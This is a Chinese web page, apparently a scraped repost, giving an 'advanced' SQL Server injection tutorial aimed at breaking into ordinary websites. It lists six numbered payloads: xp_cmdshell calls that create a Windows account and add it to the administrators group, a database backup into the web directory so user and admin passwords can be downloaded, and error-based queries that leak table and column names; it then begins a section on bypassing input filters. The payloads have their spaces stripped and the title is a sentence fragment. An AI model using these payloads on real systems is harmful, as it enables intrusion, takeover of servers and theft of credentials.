然后执行存储过程xp

  • 栏目:数据 时间:2020-04-17 01:09
<返回列表

看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。 一、利用系统表注入SQLServer数据库 SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ①;execmaster..xp_cmdshellnetusernamepassword/add-- 分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着: ②;execmaster..xp_cmdshellnetlocalgroupnameadministrators/add-- 将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。 ③;;anddb_name()>0 前面有个类似的例子anduser>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。 ④;backupdatabase数据库名todisk=c:inetpub;-- 这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法,但成功率不高。 ⑤;;and(SelectTop1namefromsysobjectswherextype=Uandstatus>0)>0 前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=Uandstatus>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。 ⑥;;and(SelectTop1col_name(object_id(表名),1)fromsysobjects)>0 从⑤拿到表名后,用object_id(表名)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。 以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。 二、绕过程序限制继续注入 在入门篇提到,有很多人喜欢用号测试注入漏洞,所以也有很多人用过滤号的方法来防止注入漏洞,这也许能挡住一些入门者的攻击,但对SQL注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。

上一篇:----要显示的字段列表@pagesize int = 1,我们首先创建一数据库 下一篇:程序如何知道SQL2005服务器用的是什么端口呢

更多阅读

然后执行存储过程xp

数据 2020-04-17
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到...
查看全文

程序如何知道SQL2005服务器用的是什么端口

数据 2020-04-17
1、因为SQL2000安装过程中无法修改实例名称,故安装过程中必须先安装SQL2000,然后再安装SQL2...
查看全文

----要显示的字段列表@pagesize int = 1,我们

数据 2020-04-16
mssql sql高效分页方法代码   在项目中,我们经常遇到或用到分页,那么在大数据量(百万级以...
查看全文

友情链接: 网站地图

Copyright © 2015-2019 http://www.koi-bumi.com. 韦德体育有限公司 版权所有